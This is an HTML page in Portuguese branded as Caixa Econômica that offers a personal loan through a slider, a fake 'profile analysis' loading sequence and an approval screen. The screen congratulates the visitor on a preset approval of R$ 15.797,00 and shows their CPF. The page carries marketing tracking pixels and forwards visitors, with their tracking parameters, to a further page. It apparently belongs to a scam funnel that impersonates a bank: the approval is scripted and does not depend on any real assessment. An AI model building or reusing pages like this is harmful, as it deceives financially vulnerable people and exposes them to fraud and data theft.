﻿<html lang="pt-BR"><head>
<script>
  window.pixelId = "67f41a1b2e2b5203c9648cd6";
  var a = document.createElement("script");
  a.setAttribute("async", "");
  a.setAttribute("defer", "");
  a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
  document.head.appendChild(a);
</script>

<script
  src="https://cdn.utmify.com.br/scripts/utms/latest.js"
  async
  defer
></script>
<!-- Google Tag Manager -->
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-TGV5XJVC');</script>
<!-- End Google Tag Manager -->
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">

    <title>Caixa Econômica</title>
    
     

<script src="../scripts/utms/latest-5.js" data-utmify-prevent-subids="" async="" defer=""></script>


    

    <link rel="stylesheet" href="css/gKGv936z3Z34.css">
</head>

<body>
    <div class="container" id="loan-form">
        <div class="header" style="background-color: white; display: flex; justify-content: center; margin-bottom: 20px;">
            <img src="images/logo.png" alt="" style="width: 100%; max-width: 180px;">
        </div>

        <div class="content">
            <h1>De quanto você precisa?</h1>

            <p class="subtitle">Arraste a bolinha abaixo para selecionar o valor desejado do seu empréstimo</p>

            <div class="slider-hint">
                <img src="images/ndANMxlpoxfs.png" alt="Deslize" class="hand-icon">

                <span>Deslize para ajustar o valor</span>
            </div>

            <div class="value-display">R$ <span id="value">5.000,00</span></div>

            <div class="slider-container">
                <input type="range" step="100" min="1000" max="20000" value="5000" class="slider" id="loanSlider">

                <div class="slider-values">
                    <span>R$ 1.000,00</span>

                    <span>R$ 20.000,00</span>
                </div>
            </div>

            <button class="continue-btn" onclick="startAnalysis();">Continuar</button>
        </div>
    </div>

    <div class="container hidden" id="loading-screen">
        <div class="loading-content">
            <div class="spinner"></div>

            <div class="steps">
                <div class="step">
                    <span class="checkmark">✓</span>

                    <span class="step-text">Aguarde um momento...</span>
                </div>

                <div class="step">
                    <span class="checkmark">✓</span>

                    <span class="step-text">Analisando seu perfil...</span>
                </div>

                <div class="step">
                    <span class="checkmark">✓</span>

                    <span class="step-text">Verificando limite disponível...</span>
                </div>

                <div class="step">
                    <span class="checkmark">✓</span>

                    <span class="step-text">Calculando valor máximo...</span>
                </div>

                <div class="step">
                    <span class="checkmark">✓</span>

                    <span class="step-text">Processando aprovação...</span>
                </div>
            </div>
        </div>
    </div>

    <div class="container hidden" id="approval-screen">
        <div class="header" style="background-color: white; display: flex; justify-content: center; margin-bottom: 20px;">
            <img src="images/logo.png" alt="" style="width: 100%; max-width: 180px;">
        </div>

        <div class="content">
            <div class="approval-check">✓</div>

            <h1>Parabéns! Seu empréstimo foi aprovado!</h1>

            <p class="subtitle">Estamos muito felizes em poder te ajudar nessa jornada</p>

            <div class="approval-box">
                <div class="approval-header">
                    <span class="checkmark">✓</span>

                    <span>Valor aprovado:</span>
                </div>

                <div class="approved-value" id="approved-value">R$ 15.797,00</div>

                <p class="availability">Disponível para saque imediato</p>

                <p class="cpf">CPF: <span id="cpf-display">---</span></p>
            </div>

            <div class="info-box">
                <p>Analisamos as informações do seu CPF e verificamos que este é o seu primeiro empréstimo conosco. Por isso, estamos felizes em informar que, com base nos dados analisados, podemos liberar até <span class="highlight" id="highlight-value"></span> para você!</p>

                <p>Essa é a nossa forma de começar essa parceria com responsabilidade e transparência. Estamos aqui para ajudar no que for necessário!</p>
            </div>

            <button class="continue-btn" onclick="showInstallments();">Continuar</button>
        </div>
    </div>

    <div class="container hidden" id="installments-screen">
        <div class="header" style="background-color: white; display: flex; justify-content: center; margin-bottom: 20px;">
            <img src="images/logo.png" alt="" style="width: 100%; max-width: 180px;">
        </div>

        <div class="content">
            <h1>Escolha o melhor parcelamento</h1>

            <p class="subtitle">Selecione a opção mais confortável para você</p>

            <div class="reminder-box">
                <span class="star-icon">★</span>

                <p>Lembre-se: se todas as parcelas forem pagas em dia, liberaremos valores maiores em futuros empréstimos!</p>
            </div>

            <div class="installments-options" id="installments-list">
                <!-- Installment options will be added here dynamically -->
            </div>

            <button class="continue-btn" onclick="redirectWithUTMs();">Continuar</button>

            <script>
                function redirectWithUTMs() {
                    window.location.href = '../page-07' + window.location.search;
                }
            </script>
        </div>

        <footer class="footer">
            <p>© 2025 Caixa Econômica - Todos os direitos reservados</p>

            <p>CNPJ: 09.694.966/0001-40</p>

            <p>Política de Privacidade</p>
        </footer>
    </div>

    <script src="js/YW5FANX3F2ua.js"></script>



</body>
<!-- Google Tag Manager (noscript) -->
<noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-TGV5XJVC"
height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
<!-- End Google Tag Manager (noscript) --></html>